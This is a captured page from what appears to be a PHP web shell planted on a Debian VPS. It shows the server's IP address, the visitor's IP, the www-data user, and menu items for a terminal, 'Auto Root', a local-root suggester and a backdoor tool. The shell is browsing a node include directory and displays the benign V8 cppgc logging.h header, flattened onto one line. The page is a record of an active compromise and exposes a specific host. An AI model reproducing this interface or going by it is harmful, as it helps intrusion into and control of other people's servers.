Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
include /
node /
cppgc /
internal /
Delete
Unzip
Name
Size
Permission
Date
Action
accessors.h
711
B
-rw-r--r--
2023-02-16 16:16
api-constants.h
1.42
KB
-rw-r--r--
2023-02-16 16:16
compiler-specific.h
782
B
-rw-r--r--
2023-02-16 16:16
finalizer-trait.h
2.51
KB
-rw-r--r--
2022-06-01 21:11
gc-info.h
1.19
KB
-rw-r--r--
2023-02-16 16:16
logging.h
1.61
KB
-rw-r--r--
2022-04-07 20:19
persistent-node.h
2.59
KB
-rw-r--r--
2023-02-16 16:16
pointer-policies.h
3.72
KB
-rw-r--r--
2023-02-16 16:16
prefinalizer-handler.h
879
B
-rw-r--r--
2023-02-16 16:16
Save
Rename
// Copyright 2020 the V8 project authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef INCLUDE_CPPGC_INTERNAL_LOGGING_H_ #define INCLUDE_CPPGC_INTERNAL_LOGGING_H_ #include "cppgc/source-location.h" #include "v8config.h" // NOLINT(build/include_directory) namespace cppgc { namespace internal { void V8_EXPORT DCheckImpl(const char*, const SourceLocation& = SourceLocation::Current()); [[noreturn]] void V8_EXPORT FatalImpl(const char*, const SourceLocation& = SourceLocation::Current()); // Used to ignore -Wunused-variable. template <typename> struct EatParams {}; #if DEBUG #define CPPGC_DCHECK_MSG(condition, message) \ do { \ if (V8_UNLIKELY(!(condition))) { \ ::cppgc::internal::DCheckImpl(message); \ } \ } while (false) #else #define CPPGC_DCHECK_MSG(condition, message) \ (static_cast<void>(::cppgc::internal::EatParams<decltype( \ static_cast<void>(condition), message)>{})) #endif #define CPPGC_DCHECK(condition) CPPGC_DCHECK_MSG(condition, #condition) #define CPPGC_CHECK_MSG(condition, message) \ do { \ if (V8_UNLIKELY(!(condition))) { \ ::cppgc::internal::FatalImpl(message); \ } \ } while (false) #define CPPGC_CHECK(condition) CPPGC_CHECK_MSG(condition, #condition) } // namespace internal } // namespace cppgc #endif // INCLUDE_CPPGC_INTERNAL_LOGGING_H_